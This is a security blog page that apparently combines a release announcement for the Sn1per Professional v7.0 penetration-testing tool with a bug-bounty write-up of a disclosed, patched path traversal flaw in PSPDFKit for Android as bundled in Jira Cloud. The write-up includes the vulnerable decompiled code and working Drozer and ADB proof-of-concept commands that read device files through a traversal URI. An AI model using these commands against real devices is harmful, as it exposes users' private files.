Sn1per Professional v7.0 Released!

Sn1per Professional v7.0

Sn1per Professional v7.0 is now available from the XeroSecurity website!

Buy Now

Features

  • New workspace navigator with sortable/searchable tables and usage stats
Sn1per Professional v7.0 Workspace Navigator

Sn1per Professional v7.0 Workspace Navigator

  • Added quick links to view scan tasks, unique IP’s, live hosts, like web hosts, subnets and discovered IP’s to top menu
Sn1per Professional v7.0 Workspace Dashboard

Sn1per Professional v7.0 Workspace Dashboard

  • New sortable/searchable Bootstrap 4 host list table with pagination, screenshots and full web and network meta data
Sn1per Professional v7.0 Host Table

Sn1per Professional v7.0 Host Table

  • New scan tags added for “Vulnerable”, “Takeover”, “New”, “Shelled”, “Cracked”, “Updated”, “Live”
  • Added collapsible functional sections to main report for more streamlined viewing (ie. Quick Commands, Scan Tasks, Scheduled Scans, OSINT, Takeovers, etc.)
Sn1per Professional v7.0 Accordion1

Sn1per Professional v7.0 Accordion

  • New “Quick Commands” section for quick copy/paste Sn1per commands
Sn1per Professional v7.0 Quick Commands

Sn1per Professional v7.0 Quick Commands

  • New “Scan Tasks” section to view all Sn1per scan times/dates
Sn1per Professional v7.0 Scan Tasks

Sn1per Professional v7.0 Scan Tasks

  • New “Scheduled Tasks” section to view all Sn1per scheduled scan tasks
Sn1per Professional v7.0 Scheduled Tasks

Sn1per Professional v7.0 Scheduled Tasks

  • New “OSINT” section to view OSINT data for the workspace
Sn1per Professional v7.0 OSINT1

Sn1per Professional v7.0 OSINT

  • New “Credentials” section to view all successful brute force credentials
Sn1per Professional v7.0 Credentials1

Sn1per Professional v7.0 Credentials

  • New “Vulnerabilities” section to view all vulnerabilities from various tools for the entire workspace
Sn1per Professional v7.0 Vulnerabilities1

Sn1per Professional v7.0 Vulnerabilities

  • Improved wide-screen visibility of reports
  • Added quick links to view loot folders and files
  • Added command to regenerate all detailed host reports in a workspace ‘sniper –reimportall’ command
  • Improved report generation performance via ‘sniper –reimport’ command for differential report generation
  • 100% responsive web UI resizes to fit any resolution or device.
  • Scan progress bar indicates overall scan status to ensure 100% scan coverage of the entire workspace.
  • Scan dashboard gives high level overview of workspace, including downloadable lists to all domains, scanned targets and unscanned targets. These can be easily referenced and used to scan the entire attack surface using Sn1per.
  • Reports menu includes links to all Sn1per console reports which can be downloaded and viewed from the main report.
  • Sidebar shortcuts added to both the main Sn1per report and all detailed host reports to quickly jump to each section of the report.
  • Slideshow for all gathered screenshots
  • Improved host table allows searching for scan mode tags, IP/DNS, HTTP titles, status codes, HTTP headers, WAF detection and open ports.
  • Quick links for both the HTTP and HTTPS versions for each host in the host table.
  • Scan tags to indicate which hosts has been scanned and which mode (ie. Stealth, Web, Portscan, Bruteforce, etc.) and which are new in the host table section of the report.
  • Email security section indicates any email spoofing vulnerabilities for the workspace.
  • Improved takeovers security section indicates any potential domain takeovers or hijacking vulnerabilities.
Sn1per Professional v7.0 Email Takeovers1

Sn1per Professional v7.0 Email Takeovers

  • HTML5 notepad saves automatically to the main report elevating the need to save your work (keep in mind, it uses the local browser cache, so switching browsers or clearing your browser cache will remove your notes!).
  • Detailed host reports are now separate from the main report and include the following features:
    • Updated recon and google dork links
    • 34 customized recon links.
    • 26 customized Google dork links.
    • HTTP/HTTPS quick links.
    • Reports menu to download the full HTML console reports for each host.
    • Added Arachni HTML report imports for all “webscan” mode scans
    • Sn1per Professional v7.0 Arachni Report1

      Sn1per Professional v7.0 Arachni Report

    • Sidebar quick links to jump to each section of the report.
    • HTTP/HTTPS screenshots
    • DNS
    • Sub-domains
    • Open ports
      • Links to full NMap HTML host reports.
      • Sn1per Professional v7.0 NMap HTML Report1

        Sn1per Professional v7.0 NMap HTML Report

    • Fingerprint info
    • HTTP headers
    • Web files
      • Links to download all discovered web files for each host
    • Web URL’s
      • Links to download all discovered URL’s for each host
    • SSL/TLS info
    • New Web Application Scans
    • Sn1per Professional v7.0 Web Application Scans1

      Sn1per Professional v7.0 Web Application Scans

    • New Credentials
    • New Vulnerabilities
  • Single user license
  • Professional technical support

Documentation

https://xerosecurity.com/wordpress/documentation/

Legal Agreement and Disclaimer

By purchasing and/or using Sn1per, you are agreeing to the following end user license agreement referenced here:

https://xerosecurity.com/wordpress/legal/

Exploiting Path Traversal in PSPDFKit for Android (2.3.3 – 2.8.0)

 

Introduction

As part of my research into the Atlassian bug bounty program managed by BugCrowd (https://bugcrowd.com/atlassian), I recently discovered a directory traversal vulnerability in PSPDFKit for Android 2.3.3 – 2.8.0. After announcing my discovery on Twitter (https://twitter.com/crowdshield/status/889690387513724928), I received a few tweets asking for a tutorial and PoC of my discoveries and decided to create a blog post to document it. This particular vulnerability was discovered in the Atlassian Jira Cloud application and was verified to be fixed in the latest release.

Technical Background

The Jira Cloud Android application (com.atlassian.android.jira.core) is vulnerable to directory traversal via the following exported content provider: content://com.atlassian.android.jira.core.pdf.share/. This allows an attacker to view the local file system on the affected Android device from external 3rd party applications installed on the same device. To exploit this flaw, an attacker can create a malicious application which queries the content provider directly in order to retrieve specific files stored locally on the device. If the victim installs the malicious application, an attacker can read files stored locally on the device. Alternatively, the content provider can be queried directory via the Android debug bridge (ADB) and does not require “root” access.

Detection

To enumerate the Android application, I used reverse-apk (https://github.com/1N3/ReverseAPK) which is a tool I wrote to reverse APK files. This revealed an exported content provider named com.pspdfkit.document.sharing.DocumentSharingProvider which means 3rd party apps on the same device can query the provider directly.

# reverse-apk com.atlassian.android.jira.apk
... SNIP ...
Displaying Content Providers in AndroidManifest.xml...
=====================================================================
<provider android:authorities="com.atlassian.android.jira.core.pdf.share" android:exported="true"
android:grantUriPermissions="true" android:name="com.pspdfkit.document.sharing.DocumentSharingProvider"/>
... SNIP ...

Scanning

Next, I used Drozer to scan for common vulnerabilities such as SQL injection and directory traversal. This revealed a vulnerable content provider (content://com.atlassian.android.jira.core.pdf.share) but did not detail how to exploit the flaw.

# drozer console --server 127.0.0.1:31415 connect
drozer Console (v2.3.4)
dz> run scanner.provider.traversal -a com.atlassian.android.jira.core
Scanning com.atlassian.android.jira.core...
Not Vulnerable:
content://com.atlassian.android.jira.core.feedback.fileprovider
content://downloads/public_downloads
content://com.atlassian.android.jira.core/
content://com.atlassian.android.jira.core
content://com.atlassian.android.jira.core.pdf.assets
content://com.atlassian.android.jira.core.feedback.fileprovider/
content://downloads/public_downloads/
content://com.atlassian.android.jira.core.pdf.assets/
Vulnerable Providers:
content://com.atlassian.android.jira.core.pdf.share
content://com.atlassian.android.jira.core.pdf.share/
dz> run scanner.provider.traversal -a com.atlassian.android.jira.core
Scanning com.atlassian.android.jira.core...
Not Vulnerable:
content://com.atlassian.android.jira.core.feedback.fileprovider
content://downloads/public_downloads
content://com.atlassian.android.jira.core/
content://com.atlassian.android.jira.core
content://com.atlassian.android.jira.core.pdf.assets
content://com.atlassian.android.jira.core.feedback.fileprovider/
content://downloads/public_downloads/
content://com.atlassian.android.jira.core.pdf.assets/
Vulnerable Providers:
content://com.atlassian.android.jira.core.pdf.share
content://com.atlassian.android.jira.core.pdf.share/

Source Code Analysis

Drozer seemed to indicate that the content provider was vulnerable to directory traversal so I decided to take a look at the source code to confirm for myself. This was accomplished by running reverse-apk and opening the affected file. This confirmed that the content provider accepts URI strings via the ParcelFileDescriptor method and reads the contents (ParcelFileDescriptor.open(file, i);).

com.atlassian.android.jira.core.apk-jadx/com/pspdfkit/document/sharing/DocumentSharingProvider.java

public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
if (uri.getPath() == null) {
throw new FileNotFoundException(uri + " has empty path.");
} else if (getContext() == null) {
throw new IllegalStateException("Context was null.");
} else {
try {
int i;
File file = new File(getSharedFileDirectory(getContext()), uri.getPath());
if ("r".equals(mode)) {
i = 268435456;
} else if ("w".equals(mode) || "wt".equals(mode)) {
i = 738197504;
} else if ("wa".equals(mode)) {
i = 704643072;
} else if ("rw".equals(mode)) {
i = 939524096;
} else if ("rwt".equals(mode)) {
i = 1006632960;
} else {
i = 0;
}
return ParcelFileDescriptor.open(file, i);
} catch (IOException e) {
throw new FileNotFoundException(uri.toString() + " was not found.");
}
}
}

Exploitation

Now that I knew the content provider was vulnerable, I had to actually exploit this to do something useful. To do this, I used ADB (Android Debug Bridge) and Drozer (they essentially are the same thing and yield the same result..).

Drozer PoC

run app.provider.read content://com.atlassian.android.jira.core.pdf.share/.//..//.//..//.//..//.//..
//.//..//.//..//.//..//.//..///etc/hosts
127.0.0.1 localhost

ADB PoC

adb shell content query --uri content://com.atlassian.android.jira.core.pdf.share/.//..//.//..//.//..
//.//..//.//..//.//..//.//..//.//..///etc/hosts
127.0.0.1 localhost

Conclusion

After discovering the flaw, I reported the issue to Atlassian via BugCrowd and the issue was triaged by a BugCrowd analyst. Unfortunately, Atlassian later came back and reported that this issue was a duplicate and noted that this was a known issue affecting PSPDFKit for Android and has since been patched. As a consolation, I figured this would make a good blog post and Atlassian was nice enough to allow me to disclose the details publicly. The original advisory for PSPDFKit can be found below.

References

https://pspdfkit.com/guides/android/current/announcements/path-traversal-vulnerability/

Credit: [email protected]

Advanced Client Side Exploitation Using BeEF